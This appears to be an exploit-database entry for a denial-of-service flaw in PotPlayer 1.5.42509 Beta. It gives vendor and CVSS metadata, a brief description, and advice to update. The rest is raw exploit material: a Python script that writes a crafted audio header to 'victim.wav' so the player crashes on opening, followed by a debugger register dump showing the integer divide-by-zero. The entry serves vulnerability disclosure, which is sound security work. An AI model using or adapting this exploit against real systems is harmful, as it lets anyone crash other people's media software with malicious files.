PotPlayer 1.5.42509 Beta - DOS(Integer Division by Zero Exploit)

vendor:

PotPlayer

by:

sajith

7,5

CVSS

HIGH

Integer Division by Zero Exploit

369

CWE

Product Name: PotPlayer

Affected Version From: 1.5.42509 Beta

Affected Version To: 1.5.42509 Beta

Patch Exists: YES

Related CWE: N/A

CPE: a:daum_communications:potplayer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2020

PotPlayer 1.5.42509 Beta – DOS(Integer Division by Zero Exploit)

PotPlayer 1.5.42509 Beta is vulnerable to an Integer Division by Zero Exploit. This vulnerability can be exploited by creating a malicious file with a specially crafted header. When the file is opened in PotPlayer, it will cause a divide-by-zero exception, resulting in a denial of service.

Mitigation:

Update to the latest version of PotPlayer.

Source

Exploit-DB raw data:

###########################################################
#[~] Exploit Title:PotPlayer 1.5.42509 Beta - DOS(Integer Division by Zero
#Exploit)
#[~] Author: sajith
#[~] version: PotPlayer 1.5.42509 Beta
#[~]Vendor Homepage: http://daumpotplayer.com/
#[~] Tested in: Windows XP SP3
#[~] vulnerable app link:http://daumpotplayer.com/download/
###########################################################

#POC:
#-------
#!/usr/bin/python
raw_input("Hit Enter to create a malicious file")

f = open("victim.wav","w")

header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
f.write(header)

print "[#] File created by sajith shetty"

raw_input("Hit enter to exit")
#-----
'''
(694.4d8): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=040e0be0 ecx=00000000 edx=00000000 esi=ffffffff
edi=0021977a
eip=748fe82c esp=0131f2a0 ebp=0131f334 iopl=0         nv up ei pl zr na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010246
'''